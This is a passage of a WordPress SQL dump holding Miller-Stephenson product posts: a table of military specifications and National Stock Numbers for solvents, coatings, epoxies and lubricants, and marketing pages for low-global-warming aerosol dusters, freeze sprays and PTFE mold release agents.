href="https://www.miller-stephenson.com/product/vertrel-smt/">Vertrel SMT</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5664</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">5 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5659</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/vertrel-xf/">Vertrel XF</a></td>\r\n<td style="text-align: center;">Cleaning Agent</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">6850-01-435-5660</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/solvsys/flux-removers/"><strong>Solvent Flux Removers</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-755l/">MS-755</a></td>\r\n<td style="text-align: center;">Vertrel SMT Heavy Duty Solvent &amp; Flux Remover</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-521-5719</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/solvents/solvsys/contact-cleaners/"><strong>Contact Cleaners</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/contact-re-nu/">MS-730</a></td>\r\n<td style="text-align: center;">Safezone Contact Re-Nu</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-1815</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/"><strong>Conformal Coatings</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td width="206">Description</td>\r\n<td width="206">Container</td>\r\n<td width="206">National Stock Number (NSN)</td>\r\n<td width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/silicone-conformal-coatings/">MS-460H</a></td>\r\n<td>Silicone Conformal Coating, moisture and fungal resistance, for communications, electronic and associated electrical equipment</td>\r\n<td>Aerosol</td>\r\n<td>UL #746E</td>\r\n<td>MIL-I-46058C Type SR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/silicone-electronic-coating/">MS-462H</a></td>\r\n<td>Silicone Conformal Coating, moisture and fungal resistance, for communications, electronic and associated electrical equipment</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td>UL #746E</td>\r\n<td>MIL-I-46058C Type SR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/mil-spec-urethane-conformal-coating/">MS-470S</a></td>\r\n<td>Superior toughness and abrasion resistance and excellent protection for humidity and organic solvents. Includes an ultraviolet (UV) indicator.</td>\r\n<td>Aerosol</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type UR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-472s/">MS-472S</a></td>\r\n<td>Superior toughness and abrasion resistance and excellent protection for humidity and organic solvents. Includes an ultraviolet (UV) indicator.</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type UR* IPC-CC-830B*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/acrylic-conformal-coatings/">MS-475C</a></td>\r\n<td>Acrylic Conformal Coating, moisture and fungus resistant, for communications, electronic, and associated electrical equipment</td>\r\n<td>Aerosol</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type AR*</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/acrylic-conformal-coating-mil-spec/">MS-477C</a></td>\r\n<td>Acrylic Conformal Coating, moisture and fungus resistant, for communications, electronic, and associated electrical equipment</td>\r\n<td>Qt, Gal, 5 Gal</td>\r\n<td></td>\r\n<td>MIL-I-46058C Type AR*</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/specialty-products/"><strong>Specialty Products</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/aeroduster-ms-222n/">MS-222N</a></td>\r\n<td style="text-align: center;">Aero-Duster</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-346-9144</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/cobra-duster/">MS-228</a></td>\r\n<td style="text-align: center;">Cobra Brush, Aerosol Attachment</td>\r\n<td style="text-align: center;">Kit</td>\r\n<td style="text-align: center;">7920-00-134-1998</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/quik-freeze/">MS-242N</a></td>\r\n<td style="text-align: center;">Quik-Freeze</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-333-1841</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/">MS-260</a></td>\r\n<td style="text-align: center;">Plastic/Glass/Metal Cleaner</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">7930-01-064-5179</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-381h/">MS-381H</a></td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-519-8521</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-381HUV</td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">6850-01-367-8095</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-383H</td>\r\n<td style="text-align: center;">Connector Lubricant</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">6850-01-538-3496</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-907-two-part-epoxy-adhesive/">MS-907</a></td>\r\n<td style="text-align: center;">Epoxy Adhesive Kit (Two Part)</td>\r\n<td style="text-align: center;">2-2 oz Tubes</td>\r\n<td style="text-align: center;">8040-00-144-9729</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/epoxy-resins/epon-epoxy-resin/"><strong>Epoxy Resins / Curing Agents</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epikure-3125/">Epikure 3125</a></td>\r\n<td style="text-align: center;">Curing Agent Polyamide</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8040-00-139-4350</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epikure-3140/">Epikure 3140</a></td>\r\n<td style="text-align: center;">Curing Agent Polyamide</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">8040-01-498-4975</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Pint</td>\r\n<td style="text-align: center;">8030-00-086-1506</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">8040-00-822-6430</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8030-01-312-1211</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-828/">Epon Resin 828</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">55 Gallon</td>\r\n<td style="text-align: center;">8040-00-040-5986</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/epon-815c/">Epon Resin 815C</a></td>\r\n<td style="text-align: center;">Epoxy Resin</td>\r\n<td style="text-align: center;">Gallon</td>\r\n<td style="text-align: center;">8040-00-843-7873</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/"><strong>Release Agents / Dry Lubricants</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/">MS-122AD</a></td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">9150-01-528-5624</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/ms-122xd/">MS-122XD</a></td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Aerosol</td>\r\n<td style="text-align: center;">9150-01-443-9003</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>MS-143H</td>\r\n<td style="text-align: center;">Release Agent / Dry Lubricant</td>\r\n<td style="text-align: center;">Quart</td>\r\n<td style="text-align: center;">9150-01-571-1708</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/"><strong>Krytox Performance Lubricants</strong></a>\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250">Product</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Container</td>\r\n<td style="text-align: center;" width="206">National Stock Number (NSN)</td>\r\n<td style="text-align: center;" width="206">Military Specification</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-143az/">Krytox 143AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Oil</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;">9150-01-106-1008</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ab/">Krytox 240AB</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td></td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-90</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">2 oz. Tube</td>\r\n<td style="text-align: center;">9150-01-088-0498</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-91</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ac/">Krytox 240AC</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;">9150-00-422-8066</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-91</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240ad/">Krytox 240AD</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">8 oz. Tube</td>\r\n<td style="text-align: center;">9150-00-961-8995</td>\r\n<td style="text-align: center;">SM-C-806563</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/product/krytox-240ad/">Krytox 240AD</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">SM-C-806563</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240az/">Krytox 240AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">8 oz. Tube</td>\r\n<td style="text-align: center;">9150-01-007-4384</td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-89</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-240az/">Krytox 240AZ</a></td>\r\n<td style="text-align: center;">Fluorinated Grease</td>\r\n<td style="text-align: center;">Any Size Container</td>\r\n<td></td>\r\n<td style="text-align: center;">MIL-PRF 276717 TYPE II QPL ID # MLS 94-89</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nThese Military Specifications and National Stock Numbers are accurate to the best of our knowledge. However, because they change so rapidly without notice, it is recommended that they be verified before using. The Epoxy and Resin Systems which meet Mil Specs are certified only to the uncured systems.\r\n* Base Resin Conforms to Mil Spec', 'Miller-Stephenson Military Spec Products / NSN', '', 'inherit', 'closed', 'closed', '', '2773-revision-v1', '', '', '2016-10-26 20:09:02', '2016-10-26 20:09:02', '', 2773, 'https://www.miller-stephenson.com/2773-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2781, 121, '2016-10-26 20:59:08', '2016-10-26 20:59:08', '', '', '', 'publish', 'closed', 'closed', '', '2781', '', '', '2016-10-26 20:59:09', '2016-10-26 20:59:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/2781/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2782, 2, '2016-10-27 12:54:50', '2016-10-27 12:54:50', '<h1><strong>MS-222L Aero-Duster® Ultra</strong></h1>\r\nMiller-Stephenson’s MS-222L Aero-Duster® Ultra is an aerosol product that is designed for convenient use in many industrial applications. It contains HFO 1234ze propellant that has an ultra-low Global Warming Potential (GWP) and is a non-ozone depleting chemical. The Aero-Duster® Ultra performs as compressed air that delivers a dry blast to remove microscopic dust in numerous applications in areas of electronic, photographic, computer, and other equipment. The Aero-Duster® Ultra is a pure product with no traces of contaminates and oils, which is essential for critical applications.\r\n\r\nAero-Duster® Ultra removes microscopic dust from:\r\n<ul>\r\n 	<li>Semiconductor chips</li>\r\n 	<li>Specimens under electron microscopes</li>\r\n 	<li>Photographic negatives</li>\r\n</ul>\r\nEnergized Electrical Equipment such as:\r\n<ul>\r\n 	<li>Micro miniature assemblies</li>\r\n 	<li>Electromechanical instruments</li>\r\n 	<li>Magnetic tapes &amp; heads</li>\r\n 	<li>Servomechanisms</li>\r\n 	<li>Computer peripherals</li>\r\n</ul>\r\nThe Cobra®Duster extension, MS-228, may be used in conjunction with the Aero-Duster for delivery to elusive trouble spots on various equipment.\r\n<h4><strong>ADVANTAGES</strong></h4>\r\n<ul>\r\n 	<li>Ultra Low Global Warming Potential</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Nonconductive</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n<h4><strong>PHYSICAL PROPERTIES OF HFO 1234ze</strong></h4>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Molecular Weight</td>\r\n<td width="206">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td>-2°F/-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor pressure (mmHg)</td>\r\n<td width="206">60.8 psia @ 68°F/20°C           159.5 psia @129.9°F/54.4°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td>1.17 @ 70°F/21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td>exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td>0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;', 'MS-222L Aero-Duster® Ultra', 'Miller-Stephenson’s MS-222L Aero-Duster® Ultra is a low global warming aerosol product that is designed for convenient use in many industrial applications.\r\n\r\n\r\n<img class="size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'ms-222l', '', '', '2016-11-24 20:42:33', '2016-11-24 20:42:33', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2782', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2783, 3, '2016-10-27 15:58:39', '2016-10-27 15:58:39', 'MS-122AVL Low global warming mold release agent combines high efficiency low-molecular weight polytetrafluoroethylene (PTFE) and proprietary surface activation chemistry. This formulation yields superior adhesion of PTFE to metallic, glass, and nonplastic surfaces. The result is unmatched durability, extended reapplication intervals and virtually no transfer. MS-122AVL low global warming mold release agent advantages include:\n<ul>\n 	<li>Unparalleled release agent durability</li>\n 	<li>Ideal for difficult mold geometries</li>\n 	<li>Improves quality and consistency of molded parts</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\n<h4><strong>Recommended Application Procedure:</strong></h4>\n<ol>\n 	<li>Clean mold surface thoroughly. Mechanical cleaning such as bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of 122AVL. Removal of all previous mold release agent is critical.</li>\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\n 	<li>Allow solvent to dry completely before molding any parts. Although it is not necessary to heat MS-122AVL, performance can be enhanced if a heating cycle is completed prior to operation. This will ensure the most effective coating for durability and cycle life.</li>\n</ol>\nMiller-Stephenson has been developing PTFE release agents for over 40 years. We have been at the forefront of development of low global warming mold release agents, typically exceeding or current and future regulatory requirements. This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE’s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AVL and MS-122SEL are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122AVL', '<p>MS-122AVL is an eco-friendly, low-global warming formulation of MS-122AV. All performance and application characteristics are maintained.</p><p><img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" data-mce-src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg"></p>', 'inherit', 'closed', 'closed', '', '2769-autosave-v1', '', '', '2016-10-27 15:58:39', '2016-10-27 15:58:39', '', 2769, 'https://www.miller-stephenson.com/2769-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2784, 3, '2016-10-27 12:43:04', '2016-10-27 12:43:04', 'Low Global Warming Mold Release Agent ', 'Low Global Warming Mold Release Agent', 'Low Global Warming Mold Release Agent ', 'inherit', 'closed', 'closed', '', 'shutterstock_389699368', '', '', '2016-10-27 12:43:58', '2016-10-27 12:43:58', '', 2769, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_389699368.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2785, 122, '2016-10-27 12:46:20', '2016-10-27 12:46:20', '', '', '', 'publish', 'closed', 'closed', '', '2785', '', '', '2016-10-27 12:46:20', '2016-10-27 12:46:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/2785/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2786, 2, '2016-10-27 12:51:38', '2016-10-27 12:51:38', '', 'MS-222L', '', 'inherit', 'closed', 'closed', '', 'shutterstock_130437422', '', '', '2016-10-27 12:52:47', '2016-10-27 12:52:47', '', 2782, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_130437422.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2787, 3, '2016-10-27 13:05:10', '2016-10-27 13:05:10', 'MS-122SEL Low Global Warming mold release agent (LGW) formulation that has high performance, high solvency mold release agent utilizing PTFE fluoropolymers (polytetrafluoroethylene) specifically designed for unsurpassed adhesion to mold surfaces and extended durability. The proprietary solvent blend ensures that proper wetting, leveling, and surface preparation occurs when applied yielding a durable, uniform thin-film. MS-122SEL offers the following benefits:\n<ul>\n 	<li>Superior adhesion to mold surfaces</li>\n 	<li>High Solvency/Rapid Evaporating Carrier Fluid</li>\n 	<li>Ideal for compression/injection molding</li>\n 	<li>Nonflammable; Non-ozone depleting formulation</li>\n 	<li>Non-migrating; Non-staining</li>\n</ul>\nMS-122SEL can be used to release the following materials:\n<ul>\n 	<li>Plastics</li>\n 	<li>Rubbers</li>\n 	<li>Resins</li>\n 	<li>Phenolics</li>\n 	<li>Acrylics</li>\n 	<li>Polycarbonates</li>\n 	<li>Urethanes</li>\n 	<li>Polystyrene</li>\n 	<li>Nylons</li>\n 	<li>Elastomers</li>\n</ul>\n<strong>Recommended Application Procedure:</strong>\n<ol>\n 	<li>Clean mold surface thoroughly. Mechanical cleaning such as, bead media blasting or steel wool, followed by chemical cleaning, provides the best surface for application of 122SEL. Removal of all previous mold release agent is critical.</li>\n 	<li>Shake can vigorously for one minute. Hold can approximately 6-8 inches away from a nonheated mold surface, and apply a light coat of release agent. NOTE: Material will apply wet and transparent, but will dry to a fine-white coat.</li>\n 	<li>Allow solvent to dry completely before molding any parts. This will ensure the most effective coating for durability and cycle life.</li>\n</ol>\nMiller-Stephenson has been developing PTFE release agents for over 40 years. We have been at the forefront of development of low global warming mold release agents, typically exceeding or current and future regulatory requirements. This class of release agent yields a uniform, dry film on the mold surface while also offering superior surface adhesion and durability.  PTFE mold release agents typically can last numerous molding cycles before re-application is necessary, and is ideal for compression and transfer molding operations.  One drawback is its relatively poor performance in injection molding, which requires surface slip that PTFE dry films cannot achieve. PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE’s chemical inertness and low-transfer will not interfere with the sensitive electronics.\n\nProduction engineers will typically choose PTFE release agent if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s MS-122AVL and MS-122SEL Low Global Warming Mold Release Agents are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\n\n<a href="https://www.miller-stephenson.com/mold-release-agents/">If you would like more information on which mold release agent is right for you click here</a>', 'MS-122SEL', 'MS-122SEL is an eco-friendly, low-global warming formulation of MS-122SE. All performance and application characteristics are maintained\n\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'inherit', 'closed', 'closed', '', '2771-autosave-v1', '', '', '2016-10-27 13:05:10', '2016-10-27 13:05:10', '', 2771, 'https://www.miller-stephenson.com/2771-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2788, 2, '2016-10-27 13:51:29', '2016-10-27 13:51:29', '<h1><strong>MS-242L Quik-Freeze® Ultra</strong></h1>\r\nMiller-Stephenson’s Quik-Freeze® Ultra is designed for convenient use in many industrial applications. They contain HFO 1234ze propellant that has an ultra-low Global Warming Potential (GWP) and is a non-ozone\r\ndepleting chemical. MS-242L is excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. It provides a rapid method of cooling small electronic components. MS-242L is utilized to locate intermittent malfunctions in electronic equipment. Applying the Quik-Freeze® Ultra will have no effect on components operating properly but faulty components will be shocked into failure mode and immediately\r\nidentified. MS-242L freezes small areas to -54°F (-47°C).\r\n<h4><strong>Quik-Freeze® Ultra is recommended for:</strong></h4>\r\n<ul>\r\n 	<li>Cooling of epoxy-composite forming.</li>\r\n 	<li>Reducing tack in pre-preg applications.</li>\r\n 	<li>Heat-cold intermittence testing of electronic components.</li>\r\n 	<li>Protection of expensive components during soldering/desoldering.</li>\r\n 	<li>Low temperature circuit testing.</li>\r\n 	<li>Nondestructive testing of electronic and electromechanical systems.</li>\r\n 	<li>Shrink fit assembly.</li>\r\n 	<li>Freezing biological specimens.</li>\r\n</ul>\r\n<strong>ADVANTAGES</strong>\r\n<ul>\r\n 	<li>Ultra-Low Global Warming Potential</li>\r\n 	<li>Nonconductive</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n<strong>PHYSICAL PROPERTIES OF HFO 1234ze</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Molecular Weight</td>\r\n<td width="206">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td>-2°F/-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor pressure (mmHg)</td>\r\n<td width="206">60.8 psia @ 68°F/20°C           159.5 psia @129.9°F/54.4°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td>1.17 @ 70°F/21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td>exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td>0</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'MS-242L Quik-Freeze® Ultra', 'Miller-Stephenson’s Quik-Freeze® Ultra contains HFO 1234ze propellant that has an ultra-low Global Warming Potential (GWP) and is a non-ozone depleting chemical.\r\n<br/><br/>\r\n<img class="alignnone size-full wp-image-2766 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/LGW2.jpg" alt="lgw2" width="100" height="79" />', 'publish', 'closed', 'closed', '', 'ms-242l-quik-freeze-ultra', '', '', '2016-10-27 14:07:23', '2016-10-27 14:07:23', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=2788', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (2789, 2, '2016-10-27 13:04:45', '2016-10-27 13:04:45', '', 'Quik-Freeze', '', 'inherit', 'closed', 'closed', '', 'shutterstock_444780952', '', '', '2016-10-27 13:17:02', '2016-10-27 13:17:02', '', 2788, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_444780952.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2790, 0, '2016-10-27 13:31:44', '2016-10-27 13:31:44', '', '', '', 'publish', 'closed', 'closed', '', '2790', '', '', '2016-10-27 13:31:44', '2016-10-27 13:31:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2790/', 0, 'nf_sub', '', 0); 
